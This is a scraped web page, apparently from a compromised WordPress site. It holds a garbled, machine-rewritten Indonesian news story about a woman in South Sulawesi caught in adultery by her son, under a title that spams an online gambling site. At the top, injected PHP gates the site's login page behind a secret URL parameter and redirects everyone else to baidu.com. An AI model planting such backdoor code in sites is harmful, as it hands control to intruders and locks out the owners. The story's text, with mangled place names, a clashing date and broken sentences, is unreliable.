//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } IRT berselingkuh di awal, dan lampu teras terkejut anak itu padam | daftar s128_www.s1288.net_s1288 net

TRIBUNNEWS.COM, Ibu Rumah Tangga Negeri (IRT) Negeri Takaral di Kabupaten Takaral, Provinsi Sulawesi Selatan, dengan malu-malu memergoki seorang anak selingkuh dan kabur dari rumah.

Wanita (55) bernama disingkat RBN ini diketahui melakukan hubungan seks dengan pria yang bukan suaminya pada dini hari Kamis (11 Mei 2020).

Peristiwa terjadi di dekat Batuyala Palko, Desa Palko, Kecamatan Polonponken Uttara, Kabupaten Takaral. Putranya dan seorang pria bermarga BDN adalah warga Jl Batuara, Desa Palleko, Desa Palleko, Polongbangkeng, Takar Utara.

Utara AKP Hermansyah mengatakan, kejadian bermula saat BDN masuk ke rumah RBN dari belakang melalui pintu rumah milik RBN.

Setelah itu, keduanya memasuki ruang depan rumah dan menjalin hubungan. Seperti pasangan.

“BDN masuk dari pintu belakang rumah dan berhubungan seks seperti pasangan,” katanya. — Tak lama kemudian, anak (DI) kembali ke rumah dan menjadi curiga karena lampu teras padam.

Kemudian DI masuk dan membuat ibunya dan laki-laki lain selingkuh di ruang depan. – “Putranya masuk karena dia curiga DI membuat takut lampu teras,” kata DI. Dia menyatakan.

Add Comment

Your email address will not be published. Required fields are marked *